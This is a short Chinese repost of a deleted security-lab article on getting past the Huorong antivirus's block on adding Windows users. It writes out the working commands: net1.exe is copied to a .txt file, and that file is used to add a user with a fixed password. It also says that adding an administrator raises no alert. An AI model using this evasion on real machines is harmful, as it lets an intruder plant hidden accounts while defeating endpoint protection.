源自於某安全實驗室發文,文章出來一小時內就被刪啦,大致內容如下
正常添加net和net1攔截如下
文章其實實際就是火絨加用戶的繞過方式,也並非火絨存在漏洞,火絨官方都發文了!添加用戶最終效果如下
copy c:\windows\system32\net1.exe aaa.txt
aaa.txt user y11 Aa123456@@@ /add
其實也就只檢測了加用戶,加管理是不會有告警的
添加用戶(過火絨)
免責聲明!
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。